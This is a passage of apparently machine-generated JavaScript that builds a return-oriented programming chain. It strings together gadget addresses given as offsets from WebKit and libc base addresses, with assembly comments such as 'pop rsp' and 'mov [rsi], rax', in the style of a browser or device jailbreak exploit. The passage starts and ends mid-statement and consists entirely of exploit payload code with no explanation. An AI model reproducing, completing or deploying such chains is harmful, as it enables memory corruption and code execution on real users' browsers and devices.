0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9507: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9508: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+446032, //L9509+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+446024, //L9509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9509: db([0, 0]); // 0x0 set_gadgets([ ropchain+446048, //L9509+24 ropchain+453024, //L9504 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9512: 
db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+446184, //L9515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+446168, //L9513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9513: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9515: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+446344, //L9519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+446296, //L9516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+446312, //L9517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9516: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9518: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L9519: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+446400, //L9520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9520: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9522: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+446520, //L9523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+446536, //L9525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9523: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9525: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+446624, //L9526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+446640, //L9528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9526: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9528: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9529: db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L9531: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+446800, //L9534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+446784, //L9532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9532: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9534: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+446976, //L9537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+446992, //L9538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+446944, //L9535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+446960, //L9536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9535: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9536: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9537: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9538: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+447088, //L9540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+447072, //L9539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9539: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9540: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+447168, //L9541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9541: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9543: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+447288, //L9546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+447272, //L9544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9546: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+447464, //L9549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+447480, //L9550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+447432, //L9547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+447448, //L9548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9547: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9548: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L9549: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9550: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+447576, //L9552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+447560, //L9551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9551: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9552: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+447656, //L9553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9553: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9555: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+447776, //L9558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+447760, //L9556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9556: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9558: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+447952, //L9561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+447968, //L9562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+447920, //L9559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+447936, //L9560 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+763368 //pop rcx ]); //L9559: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9560: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9562: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+448064, //L9564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+448048, //L9563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9563: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9564: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+448144, //L9565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9565: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9567: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+448264, //L9570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+448248, //L9568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9568: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9570: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+448440, //L9573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+448456, //L9574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+448408, //L9571 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+448424, //L9572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9571: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9572: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9574: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+448616, //L9578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+448584, //L9576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+448600, //L9577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9575: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9576: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9577: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9578: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+448720, //L9580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+448704, //L9579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9579: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9580: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+448800, //L9581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9581: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9583: db([4294967232, 4294967295]); // -0x40 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+448920, //L9586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+448904, //L9584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9584: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9586: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+449064, //L9589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+449032, //L9587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+449048, //L9588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9587: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9589: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+449144, //L9590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9590: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9591: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9592: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+449288, //L9593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+449320, //L9595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+449304, //L9594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L9593: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9594: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9595: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+449432, //L9597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L9596: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9597: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+449536, //L9598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9599: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9600: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+449664, //L9602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+449648, //L9601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9601: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9602: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+449744, //L9603 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9603: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9605: db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+449864, //L9608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+449848, //L9606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9606: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9608: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+449976, //L9609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+450008, //L9611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+449992, //L9610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9609: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9610: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9611: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+450184, //L9613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+450200, //L9614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+450168, //L9612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9612: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L9613: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9614: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+450312, //L9616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+450360, //L9619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+450328, //L9617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9616: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9617: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9618: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9619: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+450472, //L9620+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+450464, //L9620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9620: db([0, 0]); // 0x0 set_gadgets([ ropchain+450488, //L9620+24 ropchain+450816, //L9615 libc_base+764760, //pop rsi ropchain+450528, //L9621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9621: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9623: db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+450648, //L9626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+450632, //L9624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9624: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9626: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+450792, //L9630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+450760, //L9628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+450776, //L9629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9628: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9629: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9630: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+451376, //L9627 //L9615: libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+450856, //L9631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9631: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9632: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9633: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+450984, //L9635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+450968, //L9634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9634: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+451064, //L9636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9636: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9638: db([4294967232, 4294967295]); // -0x40 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+451184, //L9641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+451168, //L9639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9641: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+451296, //L9642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+451328, //L9644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+451312, //L9643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9644: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L9627: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+451448, //L9645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9645: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9647: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+451568, //L9650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+451552, //L9648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9648: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9650: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+451712, //L9653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+451680, //L9651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+451696, //L9652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9651: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9652: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+451792, //L9654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9654: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9656: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+451912, //L9659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+451896, //L9657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9657: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9659: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+452056, //L9662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+452024, //L9660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 
